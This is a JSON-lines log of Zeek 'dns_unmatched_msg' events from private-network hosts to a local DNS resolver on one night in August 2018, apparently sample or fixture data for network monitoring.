+{"ts":"2018-08-03T23:39:15.026361Z","uid":"Clo8zRCI4XD4BSMBe","id.orig_h":"192.168.0.54","id.orig_p":56531,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.051637Z","uid":"CjY8qD2EkkxOl83gL4","id.orig_h":"192.168.0.54","id.orig_p":60025,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.077016Z","uid":"Ctp2Nz3W7YhI8ryvOi","id.orig_h":"192.168.0.54","id.orig_p":61418,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.047365Z","uid":"CXyDRpzaZM20NnSs","id.orig_h":"192.168.0.54","id.orig_p":60746,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.047365Z","uid":"CGdRyoEsLmQ6P3tI3","id.orig_h":"192.168.0.54","id.orig_p":50719,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.077860Z","uid":"CjOoZl0ZMYT6kqMl","id.orig_h":"192.168.0.54","id.orig_p":57416,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.088048Z","uid":"CzBs4Q3jvFSgrbSM52","id.orig_h":"192.168.0.54","id.orig_p":49691,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.098155Z","uid":"CCXD0U2Kf8uYRCZtw5","id.orig_h":"192.168.0.54","id.orig_p":59828,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.890445Z","uid":"C1PnCn3hQLblGfH9Sa","id.orig_h":"192.168.0.54","id.orig_p":49831,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.991665Z","uid":"CiMXbQ3o2tWL4NDbFh","id.orig_h":"192.168.0.54","id.orig_p":64902,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.027090Z","uid":"Cx2nAd16aHQkCfTt08","id.orig_h":"192.168.0.54","id.orig_p":49898,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.037226Z","uid":"CyZW0RxxeAxOWoZNc","id.orig_h":"192.168.0.54","id.orig_p":55794,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.037226Z","uid":"CdyBL13SFzbO3LYxfg","id.orig_h":"192.168.0.54","id.orig_p":64805,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.077750Z","uid":"Ct2F7r3HuGIBlmvYIa","id.orig_h":"192.168.0.54","id.orig_p":53811,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.077750Z","uid":"CpjsYk17J9qu1GhZtc","id.orig_h":"192.168.0.54","id.orig_p":51016,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.285434Z","uid":"CjfCky3iuy3qtGbLei","id.orig_h":"192.168.0.54","id.orig_p":63263,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.310703Z","uid":"CxCcK95UovAkZ5P8a","id.orig_h":"192.168.0.54","id.orig_p":49754,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.017215Z","uid":"Cg0UMFAO074RA0Jbl","id.orig_h":"192.168.0.54","id.orig_p":58008,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.027340Z","uid":"CXPZoY21LdfidSrUFi","id.orig_h":"192.168.0.54","id.orig_p":55675,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.042587Z","uid":"CDG9783NyKXzIb1Cj2","id.orig_h":"192.168.0.54","id.orig_p":59590,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.113409Z","uid":"CsuMBp1V0MvKtPpi44","id.orig_h":"192.168.0.54","id.orig_p":65303,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.300771Z","uid":"CLPsvk3s0WwtA6Tlij","id.orig_h":"192.168.0.54","id.orig_p":53960,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.944245Z","uid":"C2PZEM2uXpQ5CcGplg","id.orig_h":"192.168.0.51","id.orig_p":26726,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.030230Z","uid":"Cdxkmt1cBelYEXBhe1","id.orig_h":"192.168.0.54","id.orig_p":52648,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.040364Z","uid":"CqewVT2zqKOYJBgpf7","id.orig_h":"192.168.0.54","id.orig_p":50044,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.065663Z","uid":"CfQrgzThLL8tKOUJ7","id.orig_h":"192.168.0.54","id.orig_p":58351,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.012448Z","uid":"CNGvMD2geRIFnIFl31","id.orig_h":"192.168.0.54","id.orig_p":63270,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.103548Z","uid":"CKto2T3YcnzsD4wwKh","id.orig_h":"192.168.0.54","id.orig_p":53271,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.326346Z","uid":"CiCYkQ1iUYwpnLuXOl","id.orig_h":"192.168.0.54","id.orig_p":63122,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.068946Z","uid":"CN8CWS3kUrM6YWhyZe","id.orig_h":"192.168.0.54","id.orig_p":64654,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.094224Z","uid":"CfpbPyHh1qNyW4V0i","id.orig_h":"192.168.0.54","id.orig_p":57333,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.120683Z","uid":"Cs5IR12K78V9Qtkng2","id.orig_h":"192.168.0.54","id.orig_p":62677,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.327069Z","uid":"Cwu6kdwWIYGlS77Fa","id.orig_h":"192.168.0.54","id.orig_p":54795,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.054457Z","uid":"C0dZtUb3zKSPk56rf","id.orig_h":"192.168.0.54","id.orig_p":61949,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.099946Z","uid":"C60GDU1sp1En0LJifh","id.orig_h":"192.168.0.54","id.orig_p":53138,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.001722Z","uid":"CIpE853jHMDKGCvki2","id.orig_h":"192.168.0.54","id.orig_p":65091,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.077642Z","uid":"CJbyKm2ax569rMTZJ1","id.orig_h":"192.168.0.54","id.orig_p":53601,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.113080Z","uid":"C296N64zWjhbFPyGV","id.orig_h":"192.168.0.54","id.orig_p":58715,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.285279Z","uid":"C29QlY2IpDjJMOSvr4","id.orig_h":"192.168.0.54","id.orig_p":57256,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:14.978786Z","uid":"CT8uMa4diB8yq7ytxf","id.orig_h":"192.168.0.54","id.orig_p":49899,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.064843Z","uid":"CvXndB1zsgdeCmoMB7","id.orig_h":"192.168.0.54","id.orig_p":53149,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.125574Z","uid":"CrrrA430YWSYOsAF0i","id.orig_h":"192.168.0.54","id.orig_p":62403,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.125574Z","uid":"Cwcsk01WjzUezPFjff","id.orig_h":"192.168.0.54","id.orig_p":55120,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.895432Z","uid":"CEnifZTgTBpraq7kl","id.orig_h":"192.168.0.51","id.orig_p":50950,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.580162Z","uid":"C6eYv92UbAUFImhFC7","id.orig_h":"192.168.0.54","id.orig_p":59543,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.116721Z","uid":"C6zBdr21I4ffBT6nkh","id.orig_h":"192.168.0.51","id.orig_p":11529,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.074991Z","uid":"CfEzH64uv6oEZfRkSd","id.orig_h":"192.168.0.51","id.orig_p":41319,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.105285Z","uid":"CopR7Y1BSI3vJda07","id.orig_h":"192.168.0.51","id.orig_p":18066,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.645037Z","uid":"C9grUe3jQpkZuOkaIa","id.orig_h":"192.168.0.54","id.orig_p":60528,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.995573Z","uid":"Ca9P9X34hQQYQBQFZ1","id.orig_h":"192.168.0.54","id.orig_p":56607,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.273390Z","uid":"CUkBxn3HpGrLsevFbd","id.orig_h":"192.168.0.54","id.orig_p":60294,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.273390Z","uid":"Cbifvc4WRv3VdNf4Kj","id.orig_h":"192.168.0.54","id.orig_p":61313,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.283503Z","uid":"CRqiBd1CJvhbmTaGpc","id.orig_h":"192.168.0.54","id.orig_p":64458,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.334275Z","uid":"CnSiUuwK5hPUQNgc2","id.orig_h":"192.168.0.54","id.orig_p":53768,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.963913Z","uid":"CJI6a41Lp9iomLYcDf","id.orig_h":"192.168.0.54","id.orig_p":49880,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.166396Z","uid":"CuBF7q1IGmi0sYyAOc","id.orig_h":"192.168.0.54","id.orig_p":53450,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.323691Z","uid":"CRoU1T2g1IJUWGoJm7","id.orig_h":"192.168.0.54","id.orig_p":59184,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.965209Z","uid":"CdPSbf12VsnSC3Kjz","id.orig_h":"192.168.0.54","id.orig_p":51910,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.320840Z","uid":"CefZjx3srbFUHSRUHf","id.orig_h":"192.168.0.54","id.orig_p":56474,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.859727Z","uid":"CWafuBHUQBNiOZiy7","id.orig_h":"192.168.0.54","id.orig_p":50422,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.269107Z","uid":"CSMpy43pcvNAvaHO35","id.orig_h":"192.168.0.54","id.orig_p":55404,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.378464Z","uid":"CFbRErNBJ77rNQV2h","id.orig_h":"192.168.0.54","id.orig_p":49278,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.398691Z","uid":"CO4zbW2Fpk2LEgMGTc","id.orig_h":"192.168.0.54","id.orig_p":55923,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.449340Z","uid":"CUaNpn2x0w09PZ8n83","id.orig_h":"192.168.0.54","id.orig_p":62473,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.936892Z","uid":"C4D4HQ1Q5dt1r8pApi","id.orig_h":"192.168.0.54","id.orig_p":61000,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.002653Z","uid":"CcvoZ54roCt6jJlNb9","id.orig_h":"192.168.0.54","id.orig_p":55682,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.144264Z","uid":"CQziI21z4KK5KEVfR2","id.orig_h":"192.168.0.54","id.orig_p":51425,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:15.886962Z","uid":"CEndNu2AFLB4l7w0Sc","id.orig_h":"192.168.0.51","id.orig_p":13977,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.428477Z","uid":"CWy4rs2EspuCHOcTkk","id.orig_h":"192.168.0.54","id.orig_p":56054,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.403709Z","uid":"Cf1ZDk2v3NF2h8I23h","id.orig_h":"192.168.0.51","id.orig_p":15543,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.109976Z","uid":"CR0e5m1nzQuk1KnrO3","id.orig_h":"192.168.0.54","id.orig_p":58373,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.585672Z","uid":"C334AS1CgiCTYyDnfa","id.orig_h":"192.168.0.54","id.orig_p":59996,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.671819Z","uid":"Cy4Igr4iO1Lqfa5LBl","id.orig_h":"192.168.0.54","id.orig_p":61689,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.442989Z","uid":"CN6lS41IyCtQPaC3ng","id.orig_h":"192.168.0.54","id.orig_p":51721,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.354203Z","uid":"CIyNRV2UeKvITQdKCa","id.orig_h":"192.168.0.54","id.orig_p":61649,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.404835Z","uid":"CUS1Rnv2rwiC9vae5","id.orig_h":"192.168.0.51","id.orig_p":6807,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.627427Z","uid":"CE2jM12QTetzWaUdcb","id.orig_h":"192.168.0.51","id.orig_p":44883,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.264927Z","uid":"Cj98rxOESCCRKaohf","id.orig_h":"192.168.0.51","id.orig_p":16600,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.401500Z","uid":"CJrC8v2lyYRgNz6C11","id.orig_h":"192.168.0.54","id.orig_p":61307,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.720387Z","uid":"CTBEno3R8XlJ2nrCh4","id.orig_h":"192.168.0.51","id.orig_p":63894,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.242289Z","uid":"CiXOC93GIZqPra2Z4e","id.orig_h":"192.168.0.54","id.orig_p":54671,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.308045Z","uid":"CTvVFL2hcTWQ0Ge9b1","id.orig_h":"192.168.0.54","id.orig_p":63789,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.580723Z","uid":"CouJ2UEYgKvDRj0P4","id.orig_h":"192.168.0.51","id.orig_p":61772,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.646654Z","uid":"C2RyRK21X0hpQorRmd","id.orig_h":"192.168.0.51","id.orig_p":34116,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.398090Z","uid":"CuwQoG3DmbxNXnokX7","id.orig_h":"192.168.0.54","id.orig_p":58140,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.737197Z","uid":"COJLua4jnsj59zXnl","id.orig_h":"192.168.0.54","id.orig_p":58337,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.616496Z","uid":"CY2O3aUH3XjMwqQea","id.orig_h":"192.168.0.54","id.orig_p":56631,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.391289Z","uid":"Cz7q0MV2vDXONlJV2","id.orig_h":"192.168.0.54","id.orig_p":52548,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.182508Z","uid":"CiwBJG1PbUxuKeTSO4","id.orig_h":"192.168.0.51","id.orig_p":42019,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.243361Z","uid":"CwmMhk44AMd2KBSMka","id.orig_h":"192.168.0.51","id.orig_p":42747,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.415376Z","uid":"CMBDY51DyCiSCUn4vf","id.orig_h":"192.168.0.51","id.orig_p":54416,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.476607Z","uid":"CCmMmLfWvb5HWk31g","id.orig_h":"192.168.0.54","id.orig_p":55086,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.729784Z","uid":"CdYhDw4DyWPKVyd8g7","id.orig_h":"192.168.0.51","id.orig_p":60376,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.636627Z","uid":"CA010S1WtPYj02M8xg","id.orig_h":"192.168.0.51","id.orig_p":38707,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.763250Z","uid":"C9JkQHpCaHqGZ3J2g","id.orig_h":"192.168.0.51","id.orig_p":44811,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.414647Z","uid":"CgPMuZ3l9g8KIiqLBl","id.orig_h":"192.168.0.54","id.orig_p":58709,"id.resp_h":"224.0.0.252","id.resp_p":5355,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.586670Z","uid":"CGYRl21EzLy3lTZQaj","id.orig_h":"192.168.0.54","id.orig_p":57805,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:16.746513Z","uid":"C8uuod45ZGh9qMc5fj","id.orig_h":"192.168.0.54","id.orig_p":64659,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.398383Z","uid":"CaTQ1T2WK9pxvlYCk5","id.orig_h":"192.168.0.54","id.orig_p":60928,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.489384Z","uid":"CdPlEn3tYKRkOq8oV","id.orig_h":"192.168.0.51","id.orig_p":4085,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.330321Z","uid":"CFkonX3rLIehMnHtyd","id.orig_h":"192.168.0.54","id.orig_p":55515,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.522307Z","uid":"CrfVpF3G4ZTpmzsbsk","id.orig_h":"192.168.0.54","id.orig_p":56734,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.633686Z","uid":"CfUoFu4TBpi1COE4zj","id.orig_h":"192.168.0.51","id.orig_p":62231,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.661580Z","uid":"CtDxCP3GsSrD9YqIO4","id.orig_h":"192.168.0.51","id.orig_p":31444,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.513681Z","uid":"CTcVWv3zPQVE93SqN2","id.orig_h":"192.168.0.51","id.orig_p":52150,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.771807Z","uid":"CHiO4O20ISp1jnUUAc","id.orig_h":"192.168.0.51","id.orig_p":10531,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.832538Z","uid":"Ceqlum1Um13PpYVN23","id.orig_h":"192.168.0.51","id.orig_p":9522,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.372810Z","uid":"CTKa2cit6AOiiE083","id.orig_h":"192.168.0.54","id.orig_p":59088,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.405519Z","uid":"CKHkUT39okg7b1viA7","id.orig_h":"192.168.0.54","id.orig_p":61009,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.739527Z","uid":"Cb3OJz337c1DWilmPc","id.orig_h":"192.168.0.54","id.orig_p":55523,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.830609Z","uid":"C7I3f53oGdzI8Iusle","id.orig_h":"fe80::b536:88f0:ac41:1d7a","id.orig_p":52813,"id.resp_h":"ff02::1:3","id.resp_p":5355,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.007682Z","uid":"CPvuV71dH9YBPqct99","id.orig_h":"192.168.0.54","id.orig_p":59539,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.389007Z","uid":"Cc2wbJ3Q6c2KOvHmai","id.orig_h":"192.168.0.54","id.orig_p":64627,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.874745Z","uid":"C5LyY01fktwK8i2La7","id.orig_h":"192.168.0.54","id.orig_p":51218,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.258586Z","uid":"CGN7G341GeK71gF492","id.orig_h":"192.168.0.54","id.orig_p":53229,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.738594Z","uid":"CG16Md3HtalrNYRbZ7","id.orig_h":"192.168.0.51","id.orig_p":7139,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.300318Z","uid":"Cmn64z38k0PfikCDKc","id.orig_h":"192.168.0.54","id.orig_p":52667,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.315529Z","uid":"CqqJ6F49yum0l94zi8","id.orig_h":"192.168.0.54","id.orig_p":51262,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.659677Z","uid":"CckAGS2A0y9VUZtUa1","id.orig_h":"192.168.0.51","id.orig_p":56011,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:18.003896Z","uid":"CnedHq4wi628HA2RXi","id.orig_h":"192.168.0.51","id.orig_p":10241,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.333192Z","uid":"C0xagm34ldEEimevhh","id.orig_h":"192.168.0.51","id.orig_p":43789,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.832252Z","uid":"CUTjGA3ttuYob4DAh1","id.orig_h":"192.168.0.51","id.orig_p":21483,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.973960Z","uid":"Cz8Rkw3ICqPddr3au9","id.orig_h":"192.168.0.54","id.orig_p":63253,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.725071Z","uid":"CGChjN1NNL1WWMcO8g","id.orig_h":"192.168.0.54","id.orig_p":64049,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.760543Z","uid":"C2OUvlmvhfYMXtUc7","id.orig_h":"192.168.0.54","id.orig_p":61123,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} +{"ts":"2018-08-03T23:39:17.523977Z","uid":"CKSMbgm9fqlAT58ag","id.orig_h":"192.168.0.54","id.orig_p":55949,"id.resp_h":"192.168.0.1","id.resp_p":53,"name":"dns_unmatched_msg","notice":false} 